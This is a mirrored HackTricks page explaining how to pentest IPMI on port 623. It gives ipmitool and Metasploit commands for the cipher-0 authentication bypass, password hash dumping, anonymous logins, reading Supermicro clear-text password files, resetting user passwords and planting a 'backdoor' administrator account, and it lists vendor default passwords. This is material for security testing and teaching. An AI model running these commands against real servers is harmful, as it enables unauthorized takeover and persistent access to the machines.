mirror of
https://github.com/carlospolop/hacktricks
synced 2025-01-03 00:38:52 +00:00
184 lines
10 KiB
Markdown
184 lines
10 KiB
Markdown
|
# 623/UDP/TCP - IPMI
|
||
|
|
||
|
## 623/UDP/TCP - IPMI
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
<figure><img src="/.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
|
||
|
|
||
|
{% embed url="https://academy.8ksec.io/" %}
|
||
|
|
||
|
|
||
|
## Basic Information
|
||
|
|
||
|
### **Overview of IPMI**
|
||
|
|
||
|
**[Intelligent Platform Management Interface (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** offers a standardized approach for remote management and monitoring of computer systems, independent of the operating system or power state. This technology allows system administrators to manage systems remotely, even when they're off or unresponsive, and is especially useful for:
|
||
|
|
||
|
- Pre-OS boot configurations
|
||
|
- Power-off management
|
||
|
- Recovery from system failures
|
||
|
|
||
|
IPMI is capable of monitoring temperatures, voltages, fan speeds, and power supplies, alongside providing inventory information, reviewing hardware logs, and sending alerts via SNMP. Essential for its operation are a power source and a LAN connection.
|
||
|
|
||
|
Since its introduction by Intel in 1998, IPMI has been supported by numerous vendors, enhancing remote management capabilities, especially with version 2.0's support for serial over LAN. Key components include:
|
||
|
|
||
|
- **Baseboard Management Controller (BMC):** The main micro-controller for IPMI operations.
|
||
|
- **Communication Buses and Interfaces:** For internal and external communication, including ICMB, IPMB, and various interfaces for local and network connections.
|
||
|
- **IPMI Memory:** For storing logs and data.
|
||
|
|
||
|
![https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right](https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right)
|
||
|
|
||
|
**Default Port**: 623/UDP/TCP (It's usually on UDP but it could also be running on TCP)
|
||
|
|
||
|
## Enumeration
|
||
|
|
||
|
### Discovery
|
||
|
|
||
|
```bash
|
||
|
nmap -n -p 623 10.0.0./24
|
||
|
nmap -n-sU -p 623 10.0.0./24
|
||
|
use auxiliary/scanner/ipmi/ipmi_version
|
||
|
```
|
||
|
|
||
|
You can **identify** the **version** using:
|
||
|
|
||
|
```bash
|
||
|
use auxiliary/scanner/ipmi/ipmi_version
|
||
|
nmap -sU --script ipmi-version -p 623 10.10.10.10
|
||
|
```
|
||
|
|
||
|
### IPMI Vulnerabilities
|
||
|
|
||
|
In the realm of IPMI 2.0, a significant security flaw was uncovered by Dan Farmer, exposing a vulnerability through **cipher type 0**. This vulnerability, documented in detail at [Dan Farmer's research](http://fish2.com/ipmi/cipherzero.html), enables unauthorized access with any password provided a valid user is targeted. This weakness was found across various BMCs from manufacturers like HP, Dell, and Supermicro, suggesting a widespread issue within all IPMI 2.0 implementations.
|
||
|
|
||
|
### **IPMI Authentication Bypass via Cipher 0**
|
||
|
|
||
|
To detect this flaw, the following Metasploit auxiliary scanner can be employed:
|
||
|
|
||
|
```bash
|
||
|
use auxiliary/scanner/ipmi/ipmi_cipher_zero
|
||
|
```
|
||
|
|
||
|
Exploitation of this flaw is achievable with `ipmitool`, as demonstrated below, allowing for the listing and modification of user passwords:
|
||
|
|
||
|
```bash
|
||
|
apt-get install ipmitool # Installation command
|
||
|
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
|
||
|
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password
|
||
|
```
|
||
|
|
||
|
### **IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval**
|
||
|
|
||
|
This vulnerability enables retrieval of salted hashed passwords (MD5 and SHA1) for any existing username. To test this vulnerability, Metasploit offers a module:
|
||
|
|
||
|
```bash
|
||
|
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
|
||
|
```
|
||
|
|
||
|
### **IPMI Anonymous Authentication**
|
||
|
|
||
|
A default configuration in many BMCs allows "anonymous" access, characterized by null username and password strings. This configuration can be exploited to reset passwords of named user accounts using `ipmitool`:
|
||
|
|
||
|
```bash
|
||
|
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
|
||
|
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword
|
||
|
```
|
||
|
|
||
|
### **Supermicro IPMI Clear-text Passwords**
|
||
|
|
||
|
A critical design choice in IPMI 2.0 necessitates the storage of clear-text passwords within BMCs for authentication purposes. Supermicro's storage of these passwords in locations such as `/nv/PSBlock` or `/nv/PSStore` raises significant security concerns:
|
||
|
|
||
|
```bash
|
||
|
cat /nv/PSBlock
|
||
|
```
|
||
|
|
||
|
### **Supermicro IPMI UPnP Vulnerability**
|
||
|
|
||
|
Supermicro's inclusion of a UPnP SSDP listener in its IPMI firmware, particularly on UDP port 1900, introduces a severe security risk. Vulnerabilities in the Intel SDK for UPnP Devices version 1.3.1, as detailed by [Rapid7's disclosure](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play), allow for root access to the BMC:
|
||
|
|
||
|
```bash
|
||
|
msf> use exploit/multi/upnp/libupnp_ssdp_overflow
|
||
|
```
|
||
|
|
||
|
|
||
|
### Brute Force
|
||
|
|
||
|
**HP randomizes the default password** for its **Integrated Lights Out (iLO)** product during manufacture. This practice contrasts with other manufacturers, who tend to use **static default credentials**. A summary of default usernames and passwords for various products is provided as follows:
|
||
|
|
||
|
- **HP Integrated Lights Out (iLO)** uses a **factory randomized 8-character string** as its default password, showcasing a higher security level.
|
||
|
- Products like **Dell's iDRAC, IBM's IMM**, and **Fujitsu's Integrated Remote Management Controller** use easily guessable passwords such as "calvin", "PASSW0RD" (with a zero), and "admin" respectively.
|
||
|
- Similarly, **Supermicro IPMI (2.0), Oracle/Sun ILOM**, and **ASUS iKVM BMC** also use simple default credentials, with "ADMIN", "changeme", and "admin" serving as their passwords.
|
||
|
|
||
|
|
||
|
## Accessing the Host via BMC
|
||
|
|
||
|
Administrative access to the Baseboard Management Controller (BMC) opens various pathways for accessing the host's operating system. A straightforward approach involves exploiting the BMC's Keyboard, Video, Mouse (KVM) functionality. This can be done by either rebooting the host to a root shell via GRUB (using `init=/bin/sh`) or booting from a virtual CD-ROM set as a rescue disk. Such methods allow for direct manipulation of the host's disk, including the insertion of backdoors, data extraction, or any necessary actions for a security assessment. However, this requires rebooting the host, which is a significant drawback. Without rebooting, accessing the running host is more complex and varies with the host's configuration. If the host's physical or serial console remains logged in, it can easily be taken over through the BMC's KVM or serial-over-LAN (sol) functionalities via `ipmitool`. Exploring the exploitation of shared hardware resources, like the i2c bus and Super I/O chip, is an area that demands further investigation.
|
||
|
|
||
|
## Introducing Backdoors into BMC from the Host
|
||
|
|
||
|
Upon compromising a host equipped with a BMC, the **local BMC interface can be leveraged to insert a backdoor user account**, creating a lasting presence on the server. This attack necessitates the presence of **`ipmitool`** on the compromised host and the activation of BMC driver support. The following commands illustrate how a new user account can be injected into the BMC using the host's local interface, which bypasses the need for authentication. This technique is applicable to a wide range of operating systems including Linux, Windows, BSD, and even DOS.
|
||
|
|
||
|
```bash
|
||
|
ipmitool user list
|
||
|
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
|
||
|
2 ADMIN true false false Unknown (0x00)
|
||
|
3 root true false false Unknown (0x00)
|
||
|
|
||
|
ipmitool user set name 4 backdoor
|
||
|
ipmitool user set password 4 backdoor
|
||
|
ipmitool user priv 4 4
|
||
|
ipmitool user list
|
||
|
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
|
||
|
2 ADMIN true false false Unknown (0x00)
|
||
|
3 root true false false Unknown (0x00)
|
||
|
4 backdoor true false true ADMINISTRATOR
|
||
|
```
|
||
|
|
||
|
|
||
|
## Shodan
|
||
|
|
||
|
* `port:623`
|
||
|
|
||
|
## References
|
||
|
|
||
|
* [https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/)
|
||
|
|
||
|
|
||
|
<figure><img src="/.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
|
||
|
|
||
|
Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
|
||
|
|
||
|
{% embed url="https://academy.8ksec.io/" %}
|
||
|
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|